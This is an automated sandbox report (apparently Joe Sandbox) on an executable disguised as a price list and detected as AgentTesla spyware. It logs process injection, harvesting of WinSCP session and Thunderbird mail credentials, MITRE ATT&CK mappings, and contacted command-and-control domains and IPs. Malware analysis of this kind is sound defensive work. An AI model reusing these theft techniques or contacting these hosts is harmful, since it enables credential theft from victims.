                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  Injects a PE file into a foreign processesShow sources
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeMemory written: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1Jump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess created: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1Jump to behavior
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604422396.0000000001530000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604422396.0000000001530000.00000002.00000001.sdmpBinary or memory string: Progman
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604422396.0000000001530000.00000002.00000001.sdmpBinary or memory string: &Program Manager
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604422396.0000000001530000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeQueries volume information: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeQueries volume information: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected AgentTeslaShow sources
                  Source: Yara matchFile source: 00000000.00000002.408840217.0000000007761000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.407424044.0000000006835000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.601396712.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PRICE LIST (NOVEMBER 2020).exe PID: 1508, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PRICE LIST (NOVEMBER 2020).exe PID: 7024, type: MEMORY
                  Source: Yara matchFile source: 0.2.PRICE LIST (NOVEMBER 2020).exe.6835558.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.PRICE LIST (NOVEMBER 2020).exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PRICE LIST (NOVEMBER 2020).exe.6835558.11.unpack, type: UNPACKEDPE
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Tries to steal Mail credentials (via file access)Show sources
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: Yara matchFile source: 00000008.00000002.604780526.0000000002B11000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PRICE LIST (NOVEMBER 2020).exe PID: 1508, type: MEMORY

                  Remote Access Functionality:

                  barindex
                  Yara detected AgentTeslaShow sources
                  Source: Yara matchFile source: 00000000.00000002.408840217.0000000007761000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.407424044.0000000006835000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.601396712.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PRICE LIST (NOVEMBER 2020).exe PID: 1508, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PRICE LIST (NOVEMBER 2020).exe PID: 7024, type: MEMORY
                  Source: Yara matchFile source: 0.2.PRICE LIST (NOVEMBER 2020).exe.6835558.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.PRICE LIST (NOVEMBER 2020).exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PRICE LIST (NOVEMBER 2020).exe.6835558.11.unpack, type: UNPACKEDPE

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection112Virtualization/Sandbox Evasion25Input Capture1Security Software Discovery331Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1Credentials in Registry1Virtualization/Sandbox Evasion25Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerProcess Discovery2SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSApplication Window Discovery1Distributed Component Object ModelClipboard Data1Scheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing2LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonTimestomp1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery113Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  PRICE LIST (NOVEMBER 2020).exe26%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                  PRICE LIST (NOVEMBER 2020).exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  8.2.PRICE LIST (NOVEMBER 2020).exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                  Domains

                  SourceDetectionScannerLabelLink
                  coroloboxorozor.com0%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                  http://CMvIqY.com0%Avira URL Cloudsafe
                  http://DynDns.comDynDNS0%URL Reputationsafe
                  http://DynDns.comDynDNS0%URL Reputationsafe
                  http://DynDns.comDynDNS0%URL Reputationsafe
                  http://cps.letsencrypt.org00%URL Reputationsafe
                  http://cps.letsencrypt.org00%URL Reputationsafe
                  http://cps.letsencrypt.org00%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                  http://coroloboxorozor.com0%Avira URL Cloudsafe
                  https://api.ipify.org%$0%Avira URL Cloudsafe
                  http://r3.i.lencr.org/050%Avira URL Cloudsafe
                  http://r3.o.lencr.org00%URL Reputationsafe
                  http://r3.o.lencr.org00%URL Reputationsafe
                  http://r3.o.lencr.org00%URL Reputationsafe
                  http://L2JzF7P98hlnK.net0%Avira URL Cloudsafe
                  https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                  https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                  https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                  http://coroloboxorozor.com/base/FBD1AA88F2DB3E5E79F7212492E97FE4.html0%Avira URL Cloudsafe
                  http://mail.electrobelarmino.pt0%Avira URL Cloudsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                  http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                  http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                  http://cps.root-x1.letsencrypt.org00%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  coroloboxorozor.com
                  		104.21.71.230
                  		truefalseunknown
                  mail.electrobelarmino.pt
                  		109.71.43.243
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://L2JzF7P98hlnK.nettrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://coroloboxorozor.com/base/FBD1AA88F2DB3E5E79F7212492E97FE4.htmlfalse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005WerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifierWerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpfalse
                        		high
                        http://127.0.0.1:HTTP/1.1PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604780526.0000000002B11000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://CMvIqY.comPRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604780526.0000000002B11000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://DynDns.comDynDNSPRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604780526.0000000002B11000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://cps.letsencrypt.org0PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.606198397.0000000002E7B000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200WerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpfalse
                          		high
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haPRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604780526.0000000002B11000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphoneWerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephoneWerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovinceWerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpfalse
                                		high
                                http://coroloboxorozor.comPRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.381179952.0000000002871000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20WerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpfalse
                                    		high
                                    https://api.ipify.org%$PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604780526.0000000002B11000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		low
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authenticationWerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.oWerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidWerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.oWerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpfalse
                                            		high
                                            http://r3.i.lencr.org/05PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.606198397.0000000002E7B000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://r3.o.lencr.org0PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.606198397.0000000002E7B000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://api.ipify.org%GETMozilla/5.0PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604780526.0000000002B11000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		low
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpfalse
                                              		high
                                              http://mail.electrobelarmino.ptPRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.606198397.0000000002E7B000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.381179952.0000000002871000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpfalse
                                                		high
                                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipPRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.408840217.0000000007761000.00000004.00000001.sdmp, PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.601396712.0000000000402000.00000040.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://cps.root-x1.letsencrypt.org0PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.606198397.0000000002E7B000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                104.21.71.230
                                                		unknownUnited States
                                                		13335CLOUDFLARENETUSfalse

                                                General Information

                                                Joe Sandbox Version:31.0.0 Emerald
                                                Analysis ID:356549
                                                Start date:23.02.2021
                                                Start time:09:57:18
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 9m 9s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:PRICE LIST (NOVEMBER 2020).exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:30
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@9/4@2/1
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 0% (good quality ratio 0%)
                                                • Quality average: 0%
                                                • Quality standard deviation: 0%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 52
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                • Excluded IPs from analysis (whitelisted): 184.30.21.219, 204.79.197.200, 13.107.21.200, 51.104.139.180, 104.42.151.234, 92.122.145.220, 104.43.139.144, 13.88.21.125, 52.255.188.83, 2.20.142.209, 2.20.142.210, 51.103.5.186, 52.155.217.156, 20.54.26.129, 92.122.213.247, 92.122.213.194, 104.43.193.48, 184.30.20.56, 51.11.168.160
                                                • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                09:58:49API Interceptor1x Sleep call for process: WerFault.exe modified
                                                09:58:49API Interceptor587x Sleep call for process: PRICE LIST (NOVEMBER 2020).exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                104.21.71.230A4-058000200390-10-14_REV_pdf.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/B7EFDEC15CD29E4CF1B708AC6486760D.html
                                                Purchase_order_397484658464974945648447564845.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/C02C82A7124B198823DC14A0727ADA5A.html
                                                0603321WG_0_1 pdf.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/008D1C43D45C0A742A0D32B591796DBD.html
                                                VIws8bzjD5.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/C56E2AF17B6C065E85DB9FFDA54E4A78.html
                                                quotation_PR # 00459182..exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/4FD4067B934700360B786D96F374CFDE.html
                                                PURCHASE ORDER CONFIRMATION.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/13F70A6846505248D031FD970E34143C.html
                                                PAYRECEIPT.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/FB9E1E734185F7528241A9972CE86875.html
                                                New Order.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/787C0D9D971EA648C79BB43D6A91B32D.html
                                                TT.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/67C230E277706E38533C2138734032C2.html
                                                Payment_pdf.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/07E3F6F835A7792863F708E23906CE42.html
                                                TT.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/40B9FF72D3F4D8DF64BA5DD4E106BE04.html
                                                purchase order 1.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/AEF764C22A189B57AC28E3EBBC72AEBF.html
                                                telex transfer.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/EB6932098F110FB9EB9C8B27A1730610.html
                                                ORDER PURCHASE ITEMS.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/20872932CF927ACBA3BF36E6C823C99C.html
                                                Doc_3975465846584657465846486435454,pdf.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/92C7F4831C860C5A2BD3269A6771BC0C.html
                                                CV-JOB REQUEST______pdf.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/38A59769F794F78901E2621810DAAA3A.html
                                                CN-Invoice-XXXXX9808-19011143287989.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/6A5D4D8EB90B8B0F2BFECECFD3E55241.html
                                                Download_quotation_PR #371073.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/ABC115F63E3898678C2BE51E3DFF397C.html
                                                CN-Invoice-XXXXX9808-19011143287990.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/84D1B49C9212CA5D522F0AF86A906727.html
                                                PurchaseOrdersCSTtyres004786587.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/532020C7A3B820370CFAAC4888397C0C.html

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                coroloboxorozor.comA4-058000200390-10-14_REV_pdf.exeGet hashmaliciousBrowse
                                                • 104.21.71.230
                                                Purchase_order_397484658464974945648447564845.exeGet hashmaliciousBrowse
                                                • 104.21.71.230
                                                0603321WG_0_1 pdf.exeGet hashmaliciousBrowse
                                                • 172.67.172.17
                                                Payment_pdf.exeGet hashmaliciousBrowse
                                                • 172.67.172.17
                                                RG6ws8jWUJ.exeGet hashmaliciousBrowse
                                                • 172.67.172.17
                                                VIws8bzjD5.exeGet hashmaliciousBrowse
                                                • 104.21.71.230
                                                PURCHASE ITEMS.exeGet hashmaliciousBrowse
                                                • 172.67.172.17
                                                CN-Invoice-XXXXX9808-19011143287992.exeGet hashmaliciousBrowse
                                                • 172.67.172.17
                                                quotation_PR # 00459182..exeGet hashmaliciousBrowse
                                                • 104.21.71.230
                                                PURCHASE ORDER CONFIRMATION.exeGet hashmaliciousBrowse
                                                • 104.21.71.230
                                                PAYMENTADVICENOTE103_SWIFTCOPY0909208.exeGet hashmaliciousBrowse
                                                • 172.67.172.17
                                                XP 6.xlsxGet hashmaliciousBrowse
                                                • 172.67.172.17
                                                PAYRECEIPT.exeGet hashmaliciousBrowse
                                                • 104.21.71.230
                                                New Order.exeGet hashmaliciousBrowse
                                                • 104.21.71.230
                                                PO#87498746510.exeGet hashmaliciousBrowse
                                                • 172.67.172.17
                                                TT.exeGet hashmaliciousBrowse
                                                • 172.67.172.17
                                                Payment_pdf.exeGet hashmaliciousBrowse
                                                • 172.67.172.17
                                                TT.exeGet hashmaliciousBrowse
                                                • 104.21.71.230
                                                purchase order 1.exeGet hashmaliciousBrowse
                                                • 104.21.71.230
                                                telex transfer.exeGet hashmaliciousBrowse
                                                • 104.21.71.230

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                CLOUDFLARENETUSSecuriteInfo.com.Trojan.GenericKD.36273230.25906.exeGet hashmaliciousBrowse
                                                • 104.21.50.15
                                                A4-058000200390-10-14_REV_pdf.exeGet hashmaliciousBrowse
                                                • 104.21.71.230
                                                SecuriteInfo.com.Trojan.GenericKDZ.73124.19170.exeGet hashmaliciousBrowse
                                                • 172.67.199.58
